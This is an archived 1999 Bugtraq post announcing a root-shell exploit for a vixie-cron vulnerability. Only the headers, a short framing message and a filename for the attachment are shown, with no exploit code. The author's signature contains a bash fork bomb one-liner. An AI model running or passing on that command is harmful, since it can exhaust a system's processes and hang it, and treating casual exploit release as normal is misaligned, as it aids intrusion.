[11628] in bugtraq
Root shell vixie cron exploit
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Wed Sep 1 06:50:16 1999
Message-Id: <lcamtuf.4.05.9907051224120.392-200000@nimue.ids.pl>
Date: Mon, 5 Jul 1999 14:20:49 +0200
Reply-To: Michal Zalewski <lcamtuf@IDS.PL>
From: Michal Zalewski <lcamtuf@IDS.PL>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
For script kiddiez, here's an exploit for the recent vixie-cron vulnerability,
giving an instant root shell. Though it will help script kiddies, but as
Martin Schulze included an almost step-by-step guide on how to abuse Sendmail
flags, this exploit won't bring anything shocking - simply, it's a working
example.
** Official statement on my hwclock settings: RTC on my mainboard is
** broken, and I have no cash to replace it with a working one :( Just
** excuse my stupid 'Date:' fields in some of my postings...
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
To iterate is human, to recurse divine [P. Deutsch]
Content-Disposition: ATTACHMENT; FILENAME=rootcron